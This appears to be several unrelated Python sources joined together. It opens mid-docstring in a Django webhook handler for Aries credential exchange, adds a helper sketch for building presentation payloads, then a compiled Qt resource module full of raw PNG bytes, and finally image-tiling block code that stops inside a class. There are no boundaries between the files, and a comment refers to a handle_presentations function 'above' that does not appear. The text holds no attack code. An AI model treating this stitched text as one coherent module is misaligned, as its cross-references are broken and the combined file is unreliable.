"cred_ex_id": "e2f41814-d625-4218-9f53-879111398372", "cred_request": { ... }, "auto_offer": false, "state": "credential-issued", "updated_at": "2021-04-30 02:54:33.138119Z", "cred_issue": { "@type": "did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/issue-credential/2.0/issue-credential", "@id": "0f0104e6-43ca-47e1-85e0-4fd41b10688f", "formats": [ { "attach_id": "0", "format": "hlindy-zkp-v1.0" } ], "credentials~attach": [ { "@id": "0", "mime-type": "application/json", "data": { "base64": "..." } } ] }, "cred_offer": { ... 
}, "thread_id": "dd56313f-1787-47f7-8838-d6931284ae30" } """ cred_ex_id = message["cred_ex_id"] LOGGER.debug(f'Credential: state="{state}" cred_ex_id="{cred_ex_id}"') response_data = {} try: if state == "offer-received": LOGGER.debug("After receiving credential offer, send credential request") # no need to perform a task, we run the agent with the --auto-respond-credential-offer flag set response_data = { "success": True, "details": f"Received offer on credential exchange {cred_ex_id}", } elif state == "credential-received": cred_issue = message["cred_issue"] if cred_issue is None: LOGGER.error(" >>> Error cred_issue missing for " + cred_ex_id) return Response("Error cred_issue missing for credential", status=status.HTTP_400_BAD_REQUEST) # You can include this exception to test error reporting if RANDOM_ERRORS: raise_random_exception(cred_ex_id, 'credential-recieved') cred_data = {} for cred_fmt in cred_issue["formats"]: att_id = cred_fmt["attach_id"] cred_att = [att for att in cred_issue["credentials~attach"] if att["@id"] == att_id][0] if cred_att is None: LOGGER.error( " >>> Error data cred_att could not be parsed for " + cred_ex_id) return Response("Error credential attachment could not be parsed from cred_issue", status=status.HTTP_400_BAD_REQUEST) cred_raw_base64 = cred_att["data"]["base64"] cred_raw = json.loads(base64.b64decode(cred_raw_base64)) if cred_raw is None: LOGGER.error( " >>> Error data cred_issue could not be parsed for " + cred_ex_id) return Response("Error credential data could not be parsed from cred_issue", status=status.HTTP_400_BAD_REQUEST) cred_data = { "thread_id": cred_issue["~thread"]["thid"], "schema_id": cred_raw["schema_id"], "cred_def_id": cred_raw["cred_def_id"], "rev_reg_id": cred_raw["rev_reg_id"] if "rev_reg_id" in cred_raw else None, "attrs": {k: v["raw"] for k, v in cred_raw["values"].items()}, } return receive_credential(cred_ex_id, cred_data, "2.0") else: LOGGER.warn(f"Handler for state: {state} not implemented") response_data = {"success": True, "details": f"State received {state}"} except Exception as e: LOGGER.error(e) LOGGER.error(f"Send problem report for {cred_ex_id}") # Send a problem report for the error resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential-2.0/records/{cred_ex_id}/problem-report", post_method=True, payload={ "description": str(e) }, headers=settings.ADMIN_REQUEST_HEADERS, ) resp.raise_for_status() return Response({"success": False, "error": str(e)}) return Response(response_data) def receive_credential(cred_ex_id, cred_data, v=None): try: existing = False if PROCESS_INBOUND_CREDENTIALS: credential = Credential(cred_data) # sanity check that we haven't received this credential yet cred_id = credential.thread_id existing_credential = CredentialModel.objects.filter(credential_id=cred_id) if 0 < len(existing_credential): # TODO - credential already exists in the database, what to do? 
LOGGER.error(" >>> Received duplicate for credential_id: " + cred_id + ", exch id: " + cred_ex_id) existing = True ret_cred_id = cred_id else: # new credential, populate database credential = credential_manager.process(credential) ret_cred_id = credential.credential_id else: ret_cred_id = cred_data["thread_id"] # check if the credential is in the wallet already if existing: resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/{ret_cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: existing = False # Instruct the agent to store the credential in wallet if not existing: # post with retry - if returned status is 503 unavailable retry a few times resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/issue-credential{'-' + v if v else ''}/records/{cred_ex_id}/store", post_method=True, payload={"credential_id": ret_cred_id}, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: # TODO assume the credential exchange has completed? resp = call_agent_with_retry( f"{settings.AGENT_ADMIN_URL}/credential/{ret_cred_id}", post_method=False, headers=settings.ADMIN_REQUEST_HEADERS, ) if resp.status_code == 404: LOGGER.error( " >>> Error cred exchange id is missing but credential is not available for " + cred_ex_id + ", " + ret_cred_id) return Response("Error cred exchange id is missing but credential is not available", status=status.HTTP_400_BAD_REQUEST) pass else: resp.raise_for_status() response_data = { "success": True, "details": f"Received credential with id {ret_cred_id}", } return Response(response_data) except Exception as e: raise e def raise_random_exception(cred_ex_id, method=""): if 1 == random.randint(1, 50): print(f"Raise random exception for {cred_ex_id} from method: {method}") raise Exception("Deliberate error to test problem reporting")
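# A minimal sketch, using hypothetical referent and credential ids, of how
# handle_presentations above maps the single wallet credential it selects onto
# the payload posted to the agent's send-presentation endpoint. The helper name
# is illustrative only.
def build_presentation_payload(presentation_request, credential):
    payload = {
        "self_attested_attributes": {},
        "requested_attributes": {ref: {} for ref in presentation_request["requested_attributes"]},
        "requested_predicates": {ref: {} for ref in presentation_request["requested_predicates"]},
    }
    cred_id = credential["cred_info"]["referent"]
    # mark the selected credential for every referent this credential satisfies
    for ref in credential["presentation_referents"]:
        if ref in payload["requested_attributes"]:
            payload["requested_attributes"][ref] = {"cred_id": cred_id, "revealed": True}
        elif ref in payload["requested_predicates"]:
            payload["requested_predicates"][ref] = {"cred_id": cred_id, "revealed": True}
    return payload


# hypothetical usage:
# build_presentation_payload(
#     {"requested_attributes": {"attr_ref_1": {}}, "requested_predicates": {}},
#     {"cred_info": {"referent": "cred-123"}, "presentation_referents": ["attr_ref_1"]},
# )
# -> {"self_attested_attributes": {},
#     "requested_attributes": {"attr_ref_1": {"cred_id": "cred-123", "revealed": True}},
#     "requested_predicates": {}}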
\x9c\x09G\xb5Tx\xf6\xfb~\x13\x160X\x8b}g\x9e\xf9/\x92\xfc\xcf\xfb>\xcf\xfb\xbe\xdf\x97]\x00v\xfd\x98 \xf1\x0b\x82\x14\x02\x03\xc1u\x82\x03\xcf\xfd\xfe\x8fH\xbc\x9b \xe1W\xaf\xef\xb5*\x8c\xd6e\xdb\x02`\x19\x1e[\x09'\xf13\xfa\x19\x81\x22\xfc\xdc>vH~\x8a\xa0\xb9\xb6Y\x1c2\xcf\xadB9\xfe\x1dD\xf6Q\xd8\xc7\xe6\xe8\x87\x86={\xf6XSR\xae,\xca::\x10N\xe2\xe5I\xc3\xc41\x04\xb7>I\xf9,`\x9b]YSM\x03M\xb6\x114\xeb\xfb 1y`\x19\x9d\xc5\xbb\xef\xbe?\xc5\xab\xbe\x83\xf1\x89)LO\xcf\xae\x92\xef\xd7\xbct\x02\x11\x9f\x0f\xbe\x1d\xe3\xb2\x04CO\xb43@\x8b{\x06\xcd=.4\xeb\xec\xa8W\xf6 \x87S\x852^5C\xbc\xb0\xf4\x90\x81\xc1`\x5c&\xbfK|\xe1\x04H\x1c$8A\xfd\xdd\xeas'\xf1\xb9'\x04H\x87\x97\xc1\xd7\xbb \x22U7\xdc7\xa2\xb8N\x88,V>\xccV\xdb:q\x04,\x16k,\xfc\xce\xe7'\x10\x916\x93\x95?F}\xa5\xfe\x12\xc4o\xf4Y1\xb6\x02~\xef Z{\x9c\xe0?0\xa1L(CF\x0e\x1b\xb2\x0e\xf9&\xd2\xf9\xc5e\xcc-,!4\xbf\x88\xbd{\xf7Z\xc9;~\xbam\x02$~C\x90F=5\x13iu\xb3\x80\xd2?\x0f\xcb\xc4\xe2\x9aP\xa1Z\xb4l\xf1Y\xa0\xb6\xa0\xa6]\x8d/\xb2sq\xb7\x9e\xff\x0c1%\x9d\x09\xcdcbj\x06\x83C\x81'\xe4\xdd\xbc-\xd3\xb0;\x92\x033&\xd4S\xb5\xd3\xfbXO\x88\xc5\x03!\x88,CP\xbaF\xd0\xed\x09B\xe5\x9bB\x9bs\xfc\xa9\xcfZ\x1b\xee*t\xc8\xbc\xc9E\x09\xa7l\x93\xcf\x9b\x88'\xa7\x11\x18\x1d\xc3\x80o\x08\xa2\xd6\xd6%\xc2Q\xdb(\x12\x87\xc6\x1f\xaf\x82/b\x94M\x89$\x90\x22\xeaR-\x9aB\xab\xe8\x18y\x04\xa1\xc5\xcf\x10St\xf6\x0d\xa3\xd3\xe1\x87\xd4<\x80\x16\xbd\x03\x0d]\x06\x14\xd5\x0a\x90\x91\x95\x0d/y\xf1\xc6\xaa\xa9\xd4\xb3s\x0bL\xc5\x94\xd8\xdd\xef\x85\xc9b\x05\xb7\xbc\x12\xa5\xe5\x95K\x13\xf3\xcb\xab#\x0f\x017\xd9\x11\xe6\xd9\x15\x84\x97\x15\x13\x06\xcb<\xd0h\xf2\xa3\xdd\xee_'\x96;\x86 \xb3x\xd7}\xe6\x08\xa4\xf8<3\x1b*\x8d6\xaa\xdcS3!\x8c\x8e\x8d3\x15\xd3&\xe47\x09\xf1\xc1\xc5\x8fQs\xaf\x01\xbee`\xfc\x11\xa0#\x13#\xf2\xce\xa1\xbe]\xb9\xb8Q\x01\x83\x81ttM\xa7\x1e\x0ag\x80\xa9\xb8\xdd\xea\x83\xd8\xe8B\x93\xca\xcc\xf8|\xe5\xcb,\x88\xda$Q\x89\xa7g\xe7\x18\x1b\x86\x86G`w8I\x82:$|\xf8!\xae\xb3\x0b\xe1\x99\x5c\x80o\x09\xd0\x90\xde\xe1\x0f,\x81\xab\x1f\xc4}\xef\x04\xdd\x07\x1da\xeb\xff\x9f\xc0\x1d\xb9\x16\x1d\xf6!H\xcc\xfdO}\xee\xd4\x22\x9dU\x84\xaa\x9a\xbaM>G\xe4\x8e\xf8<<\x12\x84\xd3\xdd\x0f\xbd\xc1\x88\xc2\xe2b\x9c~/\x1e=\x03\x01\xf4/\x02\x83\x84\xbc\xc5\xff-\xee:C(Q\x91\xf7\xf6\x05\xf1N\xdc\xbf}\x843i\xe3 \x18\xf43\xab\xe0\xc9Th58\xd1\xd8\xdd\x0b\x9eX\x89\xac\x5c\xf63>G\xaa\x9e\x9c\x9ee\xe4\xee\xf7\x0e\xa2\xd7lAC\x03\x1f'b\xe3 \xe9\xd6\xc0E\xcf\x01R\x90$\xb8\x86\xb2\x9e\x00n\xb4\xdbP\xd1\x1bD\x85\xce\x8bJ~\x0bm\xbe\x9b['\xd1\xa0\x99\xf8\x16e\x22\x05\xee)\xf4(\x13\xc8\x90x5\x0b\x1a\xad>\xaa\xdcc\x13\x93\xf0\x0d\x0d\xc3f\xef\x83\xb4]\x8e\xc4K\x97\x90\xc3\xca\xc3\xd4c\xc0NzI1N\xfa\x89\x94\x7f[;\x84|\x85\x13%j\x1fJ\xd5\x03\xe8\xf20\xa3(\x22\xf8\xf93\x09t\x8f.\xa1\xa8\xbe\x15\xa5|\x09\xb2J*\xf0\xcf\xe3qQ\xe5\xf6\x07F\xd1\xe7\xf2@\xab7 \xfdj\x06\x92\xbfH\x83\xcd7\x02'\xa9\xda@\x1aL\xe0{\x88R\x9d\x1fE\xdd\xfd\x0cqA\x97\x1b\xc5\xdd\x1e\x88\x9cA\xfc\xf9\xcd\xb7]\x84\xebl\xb4C\xd0(\xf7N#\xa7\xfc\x1e\xb2K\xab\xf1Q\xeaWH\xfeo\xea\xfaXQ\xb9G\x82\xe3\xf0\x0c\xf8`4\x99Q\xc9\xab\xc2\xfbg\xcfA\xfe@\x03?\xe9n\xb2\x8d\x19\xb9oi\x06\x19\xd2\x9b*/r\xe5\x0e\xe4u\xf6\xa1\xf0\xbe\x1b\x1c\x95\x1b\xf9\x9c\xca)\xc2S\xb8\xdd)\xdc+v\x04\x90Q\xc8\xc5\x95ky8\x11\x9f\x80\x9b\xb7n3c\x15\x91\xdbjs@\x22m\xc7\x85\x84\x0fPt\xbb\x0c\xf3+\x80\x9f4X\xf7$ 
\x1c|\x84J\xd3\x188\xfaa\x86\x9cV\xfdU\xb3\x1e\xac\x0e;\xb8:\x1f\xd9!\x1ez/\xe0\x13\xbc\xba]\x02&\xbe\xc1\x83\x94o\xd88\x9f\x9c\x8a\x03\x7f=\x04c\xaf\x99\xe9n*\xb7F\xd7\x83\xa4\xcb\xc9H\xff:\x8b\x8c\xd5<S\xb5q\xf6\xa9\xdc5\xf6i\x5c\x97Y\x19\xd9\xbfn!\xa7\xa0\xd4\x82t\xbe\x1aW\x9b4`\xc9\xcc\x10\xbb\x82\xf8\xe5\xaf_\xa7g\xc0;\xe1u\x1f5\xcc5\xddf|\x94\x96\x85\xb8s\x17\xf1\x97C1L\xd5t\x99\xf0\xaa\xaaq\xfa\xf4\x19h\xcc\x0e\x8c\x92-6\x14\x1e\xabZ\xc7\x0cx\xe6qp\x0d#L\xa3e\x8a\x0c\x8c\xec\xb4\xfa\x9c\xb6^\x94t9\xd0f\xf7\xaf\x1e=\x11KG.o\xc3y\x135,\x5c\x99\x1a\xf1\x97>\xc7\xd1\xd83\xf881\x09\x86^\x13\x1a\x9b\x04\xf8\xdd\x1b\xfbQO\xd4\xf1\x90\x99\xee\x9a\x00\xaa\xad\x93`+]\x0c9\xf5\xbc\xf0\xbeg\xbd\xea\xcc\x16=JU\x1e\x08m\x01\x94\xd4\xf1C\xe1eS@\xf0\xca\xf7%`+nj\xc7\xa9\x84D\xc4\x1c9\x8a\xdc|6ZZ\xc58\x14\x13\x83/95\xc8\x14j\x98\xe6\xa2\xd5\xd2'\xf5\x9azL\x13\xa1Id\xb7\x99\x90\xdbnF\xb9\xda\x8d\x06\xa5v9,9=\xf9N\x13\xec\xd9r\xd4G\x0d;\xabF\x88c\xff9\x8f\xdf\xee\xfb=\x1a\xf9\x02\x9c\xbf\x90\x80\x93\xf1\x17p\xa3\xad\x07\x19\xc4OJ\x14\xe9n\xbaX\xa8\xef,\xfa\x94\x98P(\xb7@\xe9\x0e<\xf9W\xec)*w-\xc1g\x04\xfb\xb6\xb9\xe4D\x8d\xbe\xcc\xb2Z\xfc\xe3\xe4\x19\x1c<\xf47\xb0r\xf3\xb0\xef\xc0\x1fP \xd1!\x89'e*\xa6K\x85>\xbf!\xd5F\xe4.\x90[!\xb0\x0c\xae\xe5\xdc\xe2\xd2\x11\x13\x13\xe4\x87o<\xaf<\xe7\x96\x155\x9ciE\xe5\xf8\xfb\xb1X\x1c?\x19\x877\xf6\xef\xc7\x8d:\x11\x92\xab\xa4\x0c!\xedp\xea5U!\x8b4[\xc9\x037*4n\xd4I:\x17\xc3rs\x08\x8em\x95\xfb\x87$\xe0Jesp\xe4\xf8)\x1c>|\x98\x8cc.2\x05*\x5c\x22\xd5\xd3]~M\xdc\x0b6\xe9tv\xa7\x1dw\x8c\xe4\x88\xb6\xf9\x9e\x84\xb7\x1a\x95\xfb\x22\xbdI\xfd\x80\x0bm\xf4\x042JxL\x0f\x9cKI\xc3\xb5\xa6.|\xc2me6Y\xf1\x83\x01\x5c\x97\x9a\xc1Q{ \xf3\x04\xd7\xce%&\x056\xc8\xfd\xc7\x9d\xc8\x1d\xd5\x82\xdc\x1a\x01\xce^NE\x81X\x85x\xf6]\x5c\xa9U\x90\xaa\xfb\xc0\x96\xdbP\xadu\xe3\xaeTA/\x10\xca\x0dr\xbf\xba\xd3j\xa3\x05\xb7\xa2Q\xf8\x1d\xafC\x8dO\xb9-\x88\xcb\xe6\xe1\x9aH\x8f\xaa\x1e/\x9a5\xe6\xc7\x7fz\xf3-Wx\xac\xa8\xdc\xaf\xbd\xac\xdc\xd1\xe2\x08\xdd\x05\x5cu\x1f\xde\xcb\xafE\xb9v\x002g`\xf5\xc2\xa7\x97\xa9\xdc\xf7\x08\xd2\xa9\xdc;\xf8\x03\xf3\xc2\xf1\x13\x82\xca\x1c\xee\x9dP\x0b9\x94\xb8\x0d\xc2\xc8\x16\xa3\x17\x87\xc3/\x22\xf7\x0e\xff\xdam\x8a\xdda\x99\xd5\x1b\xb6\xd8k\xbb^2\xbe/\x89\xff\x01f\xb9_\xfc\x11\x80=\xcf\x00\x00\x00\x00IEND\xaeB`\x82" qt_resource_name = b"\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x07\x04\xcaW\xa7\x00n\x00e\x00w\x00.\x00p\x00n\x00g\x00\x08\x06|Z\x07\x00c\x00o\x00p\x00y\x00.\x00p\x00n\x00g\x00\x07\x0a\xc7W\x87\x00c\x00u\x00t\x00.\x00p\x00n\x00g\x00\x08\x08\xc8Xg\x00s\x00a\x00v\x00e\x00.\x00p\x00n\x00g\x00\x09\x0a\xa8\xbaG\x00p\x00a\x00s\x00t\x00e\x00.\x00p\x00n\x00g\x00\x08\x06\xc1Y\x87\x00o\x00p\x00e\x00n\x00.\x00p\x00n\x00g" qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x00\x00\x01\x00\x00\x03X\x00\x00\x00~\x00\x00\x00\x00\x00\x01\x00\x00\x18\xdd\x00\x00\x00P\x00\x00\x00\x00\x00\x01\x00\x00\x0d\xc5\x00\x00\x00f\x00\x00\x00\x00\x00\x01\x00\x00\x12l\x00\x00\x00<\x00\x00\x00\x00\x00\x01\x00\x00\x08\x96" def qInitResources(): QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) qInitResources()
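

# --- usage sketch (illustrative, not part of the generated resource file) ---
# Importing this compiled resource module runs qInitResources(), which registers
# the embedded PNG data with Qt's resource system; the images are then available
# under the ":/images/<name>.png" paths listed in qt_resource_name above. The
# QApplication/QPixmap lines below are an assumption about how the icons get used.
if __name__ == '__main__':
    import sys
    from PySide import QtGui
    app = QtGui.QApplication(sys.argv)
    new_pix = QtGui.QPixmap(':/images/new.png')    # loaded from the embedded data
    save_pix = QtGui.QPixmap(':/images/save.png')
    print(new_pix.isNull(), save_pix.isNull())     # both False if registration succeeded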
import numpy as np
import warnings
import math
from tqdm import tqdm
from skimage.measure import regionprops
from skimage.draw import polygon
from csbdeep.utils import _raise, axes_check_and_normalize, axes_dict
from itertools import product

from .geometry import polygons_to_label_coord, polyhedron_to_label


OBJECT_KEYS = set(('prob', 'points', 'coord', 'dist', 'class_prob', 'class_id'))
COORD_KEYS = set(('points', 'coord'))


class Block:
    """One-dimensional block as part of a chain.

    There are no explicit start and end positions. Instead, each block is aware
    of its predecessor and successor and derives such things (recursively) based
    on its neighbors.

    Blocks overlap with one another (at least min_overlap + 2*context) and
    have a read region (the entire block) and a write region (ignoring context).

    Given a query interval, Block.is_responsible will return true for only one
    block of a chain (or raise an exception if the interval is larger than
    min_overlap or even the entire block without context).
    """
    def __init__(self, size, min_overlap, context, pred):
        self.size = int(size)
        self.min_overlap = int(min_overlap)
        self.context = int(context)
        self.pred = pred
        self.succ = None
        assert 0 <= self.min_overlap + 2*self.context < self.size
        self.stride = self.size - (self.min_overlap + 2*self.context)
        self._start = 0
        self._frozen = False

    @property
    def start(self):
        return self._start if (self.frozen or self.at_begin) else self.pred.succ_start

    @property
    def end(self):
        return self.start + self.size

    @property
    def succ_start(self):
        return self.start + self.stride

    def add_succ(self):
        assert self.succ is None and not self.frozen
        self.succ = Block(self.size, self.min_overlap, self.context, self)
        return self.succ

    def decrease_stride(self, amount):
        amount = int(amount)
        assert 0 <= amount < self.stride and not self.frozen
        self.stride -= amount

    def freeze(self):
        """Call on first block to freeze entire chain (after construction is done)"""
        assert not self.frozen and (self.at_begin or self.pred.frozen)
        self._start = self.start
        self._frozen = True
        if not self.at_end:
            self.succ.freeze()

    @property
    def slice_read(self):
        return slice(self.start, self.end)

    @property
    def slice_crop_context(self):
        """Crop context relative to read region"""
        return slice(self.context_start, self.size - self.context_end)

    @property
    def slice_write(self):
        return slice(self.start + self.context_start, self.end - self.context_end)

    def is_responsible(self, bbox):
        """Responsibility for query interval bbox, which is assumed to be smaller than min_overlap.

        If the assumption is met, only one block of a chain will return true.
        If violated, one or more blocks of a chain may raise a NotFullyVisible exception.
        The exception will have an argument that is False if bbox is larger than min_overlap,
        and True if bbox is even larger than the entire block without context.

        bbox: (int,int)
            1D bounding box interval with coordinates relative to size without context
        """
        bmin, bmax = bbox
        r_start = 0 if self.at_begin else (self.pred.overlap - self.pred.context_end - self.context_start)
        r_end = self.size - self.context_start - self.context_end
        assert 0 <= bmin < bmax <= r_end
        # assert not (bmin == 0 and bmax >= r_start and not self.at_begin), [(r_start,r_end), bbox, self]

        if bmin == 0 and bmax >= r_start:
            if bmax == r_end:
                # object spans the entire block, i.e. is probably larger than size (minus the context)
                raise NotFullyVisible(True)
            if not self.at_begin:
                # object spans the entire overlap region, i.e. is only partially visible here and also by the predecessor block
                raise NotFullyVisible(False)
        # object ends before responsible region start
        if bmax < r_start:
            return False
        # object touches the end of the responsible region (only take if at end)
        if bmax == r_end and not self.at_end:
            return False
        return True

    # ------------------------

    @property
    def frozen(self):
        return self._frozen

    @property
    def at_begin(self):
        return self.pred is None

    @property
    def at_end(self):
        return self.succ is None

    @property
    def overlap(self):
        return self.size - self.stride

    @property
    def context_start(self):
        return 0 if self.at_begin else self.context

    @property
    def context_end(self):
        return 0 if self.at_end else self.context

    def __repr__(self):
        shared = f'{self.start:03}:{self.end:03}'
        shared += f', size={self.context_start}-{self.size-self.context_start-self.context_end}-{self.context_end}'
        if self.at_end:
            return f'{self.__class__.__name__}({shared})'
        else:
            return f'{self.__class__.__name__}({shared}, overlap={self.overlap}/{self.overlap-self.context_start-self.context_end})'

    @property
    def chain(self):
        blocks = [self]
        while not blocks[-1].at_end:
            blocks.append(blocks[-1].succ)
        return blocks

    def __iter__(self):
        return iter(self.chain)

    # ------------------------

    @staticmethod
    def cover(size, block_size, min_overlap, context, grid=1, verbose=True):
        """Return chain of grid-aligned blocks to cover the interval [0,size].

        Parameters block_size, min_overlap, and context will be used for all
        blocks of the chain. Only the size of the last block may differ.

        Except for the last block, start and end positions of all blocks will
        be multiples of grid. To that end, the provided block parameters may
        be increased to achieve that.

        Note that parameters must be chosen such that the write regions of
        only neighboring blocks are overlapping.
        """
        assert 0 <= min_overlap+2*context < block_size <= size
        assert 0 < grid <= block_size
        block_size = _grid_divisible(grid, block_size, name='block_size', verbose=verbose)
        min_overlap = _grid_divisible(grid, min_overlap, name='min_overlap', verbose=verbose)
        context = _grid_divisible(grid, context, name='context', verbose=verbose)

        # allow size not to be divisible by grid
        size_orig = size
        size = _grid_divisible(grid, size, name='size', verbose=False)

        # divide all sizes by grid
        assert all(v % grid == 0 for v in (size, block_size, min_overlap, context))
        size //= grid
        block_size //= grid
        min_overlap //= grid
        context //= grid

        # compute cover in grid-multiples
        t = first = Block(block_size, min_overlap, context, None)
        while t.end < size:
            t = t.add_succ()
        last = t
        # [print(t) for t in first]

        # move blocks around to make it fit
        excess = last.end - size
        t = first
        while excess > 0:
            t.decrease_stride(1)
            excess -= 1
            t = t.succ
            if (t == last): t = first

        # make a copy of the cover and multiply sizes by grid
        if grid > 1:
            size *= grid
            block_size *= grid
            min_overlap *= grid
            context *= grid
            #
            _t = _first = first
            t = first = Block(block_size, min_overlap, context, None)
            t.stride = _t.stride*grid
            while not _t.at_end:
                _t = _t.succ
                t = t.add_succ()
                t.stride = _t.stride*grid
            last = t

        # change size of last block
        # will be padded internally to the same size
        # as the others by model.predict_instances
        size_delta = size - size_orig
        last.size -= size_delta
        assert 0 <= size_delta < grid

        # for efficiency (to not determine starts recursively from now on)
        first.freeze()

        blocks = first.chain

        # sanity checks
        assert first.start == 0 and last.end == size_orig
        assert all(t.overlap-2*context >= min_overlap for t in blocks if t != last)
        assert all(t.start % grid == 0 and t.end % grid == 0 for t in blocks if t != last)
        # print(); [print(t) for t in first]

        # only neighboring blocks should be overlapping
        if len(blocks) >= 3:
            for t in blocks[:-2]:
                assert t.slice_write.stop <= t.succ.succ.slice_write.start

        return blocks


class BlockND:
    """N-dimensional block.

    Each BlockND simply consists of a 1-dimensional Block per axis and
    also has an id (which should be unique).

    The n-dimensional region represented by each BlockND is the intersection
    of all 1D Blocks per axis. Also see `Block`.
    """
    def __init__(self, id, blocks, axes):
        self.id = id
        self.blocks = tuple(blocks)
        self.axes = axes_check_and_normalize(axes, length=len(self.blocks))
        self.axis_to_block = dict(zip(self.axes,self.blocks))

    def blocks_for_axes(self, axes=None):
        axes = self.axes if axes is None else axes_check_and_normalize(axes)
        return tuple(self.axis_to_block[a] for a in axes)

    def slice_read(self, axes=None):
        return tuple(t.slice_read for t in self.blocks_for_axes(axes))

    def slice_crop_context(self, axes=None):
        return tuple(t.slice_crop_context for t in self.blocks_for_axes(axes))

    def slice_write(self, axes=None):
        return tuple(t.slice_write for t in self.blocks_for_axes(axes))

    def read(self, x, axes=None):
        """Read block "read region" from x (numpy.ndarray or similar)"""
        return x[self.slice_read(axes)]

    def crop_context(self, labels, axes=None):
        return labels[self.slice_crop_context(axes)]

    def write(self, x, labels, axes=None):
        """Write (only entries > 0 of) labels to block "write region" of x (numpy.ndarray or similar)"""
        s = self.slice_write(axes)
        mask = labels > 0
        # x[s][mask] = labels[mask] # doesn't work with zarr
        region = x[s]
        region[mask] = labels[mask]
        x[s] = region

    def is_responsible(self, slices, axes=None):
        return all(t.is_responsible((s.start,s.stop)) for t,s in zip(self.blocks_for_axes(axes),slices))

    def __repr__(self):
        slices = ','.join(f'{a}={t.start:03}:{t.end:03}' for t,a in zip(self.blocks,self.axes))
        return f'{self.__class__.__name__}({self.id}|{slices})'

    def __iter__(self):
        return iter(self.blocks)

    # ------------------------

    def filter_objects(self, labels, polys, axes=None):
        """Filter out objects that block is not responsible for.

        Given label image 'labels' and dictionary 'polys' of polygon/polyhedron objects,
        only retain those objects that this block is responsible for.

        This function will return a pair (labels, polys) of the modified label image
        and dictionary. It will raise a RuntimeError if an object is found in the
        overlap area of neighboring blocks that violates the assumption to be
        smaller than 'min_overlap'.

        If parameter 'polys' is None, only the filtered label image will be returned.

        Notes
        -----
        - Important: It is assumed that the object label ids in 'labels' and
          the entries in 'polys' are sorted in the same way.
        - Does not modify 'labels' and 'polys', but returns modified copies.

        Example
        -------
        >>> labels, polys = model.predict_instances(block.read(img))
        >>> labels = block.crop_context(labels)
        >>> labels, polys = block.filter_objects(labels, polys)
        """
        # TODO: option to update labels in-place
        assert np.issubdtype(labels.dtype, np.integer)
        ndim = len(self.blocks_for_axes(axes))
        assert ndim in (2,3)
        assert labels.ndim == ndim and labels.shape == tuple(s.stop-s.start for s in self.slice_crop_context(axes))

        labels_filtered = np.zeros_like(labels)
        # problem_ids = []
        for r in regionprops(labels):
            slices = tuple(slice(r.bbox[i],r.bbox[i+labels.ndim]) for i in range(labels.ndim))
            try:
                if self.is_responsible(slices, axes):
                    labels_filtered[slices][r.image] = r.label
            except NotFullyVisible as e:
                # shape_block_write = tuple(s.stop-s.start for s in self.slice_write(axes))
                shape_object = tuple(s.stop-s.start for s in slices)
                shape_min_overlap = tuple(t.min_overlap for t in self.blocks_for_axes(axes))
                raise RuntimeError(f"Found object of shape {shape_object}, which violates the assumption of being smaller than 'min_overlap' {shape_min_overlap}. Increase 'min_overlap' to avoid this problem.")
                # if e.args[0]:
                #     # object larger than block write region
                #     assert any(o >= b for o,b in zip(shape_object,shape_block_write))
                #     # problem, since this object will probably be saved by another block too
                #     raise RuntimeError(f"Found object of shape {shape_object}, larger than an entire block's write region of shape {shape_block_write}. Increase 'block_size' to avoid this problem.")
                #     # print("found object larger than 'block_size'")
                # else:
                #     assert any(o >= b for o,b in zip(shape_object,shape_min_overlap))
                #     # print("found object larger than 'min_overlap'")
                #     # keep object, because will be dealt with later, i.e.
                #     # render the poly again into the label image, but this is not
                #     # ideal since the assumption is that the object outside that
                #     # region is not reliable because it's in the context
                #     labels_filtered[slices][r.image] = r.label
                #     problem_ids.append(r.label)

        if polys is None:
            # assert len(problem_ids) == 0
            return labels_filtered
        else:
            # it is assumed that ids in 'labels' map to entries in 'polys'
            assert isinstance(polys,dict) and any(k in polys for k in COORD_KEYS)
            filtered_labels = np.unique(labels_filtered)
            filtered_ind = [i-1 for i in filtered_labels if i > 0]
            polys_out = {k: (v[filtered_ind] if k in OBJECT_KEYS else v) for k,v in polys.items()}
            for k in COORD_KEYS:
                if k in polys_out.keys():
                    polys_out[k] = self.translate_coordinates(polys_out[k], axes=axes)
            return labels_filtered, polys_out#, tuple(problem_ids)

    def translate_coordinates(self, coordinates, axes=None):
        """Translate local block coordinates (of read region) to global ones based on block position"""
        ndim = len(self.blocks_for_axes(axes))
        assert isinstance(coordinates, np.ndarray) and coordinates.ndim >= 2 and coordinates.shape[1] == ndim
        start = [s.start for s in self.slice_read(axes)]
        shape = tuple(1 if d!=1 else ndim for d in range(coordinates.ndim))
        start = np.array(start).reshape(shape)
        return coordinates + start

    # ------------------------

    @staticmethod
    def cover(shape, axes, block_size, min_overlap, context, grid=1):
        """Return grid-aligned n-dimensional blocks to cover region of the given shape with axes semantics.

        Parameters block_size, min_overlap, and context can be different per
        dimension/axis (if provided as list) or the same (if provided as scalar value).

        Also see `Block.cover`.
        """
        shape = tuple(shape)
        n = len(shape)
        axes = axes_check_and_normalize(axes, length=n)
        if np.isscalar(block_size): block_size = n*[block_size]
        if np.isscalar(min_overlap): min_overlap = n*[min_overlap]
        if np.isscalar(context): context = n*[context]
        if np.isscalar(grid): grid = n*[grid]
        assert n == len(block_size) == len(min_overlap) == len(context) == len(grid)

        # compute cover for each dimension
        cover_1d = [Block.cover(*args) for args in zip(shape, block_size, min_overlap, context, grid)]
        # return cover as Cartesian product of 1-dimensional blocks
        return tuple(BlockND(i,blocks,axes) for i,blocks in enumerate(product(*cover_1d)))


class Polygon:

    def __init__(self, coord, bbox=None, shape_max=None):
        self.bbox = self.coords_bbox(coord, shape_max=shape_max) if bbox is None else bbox
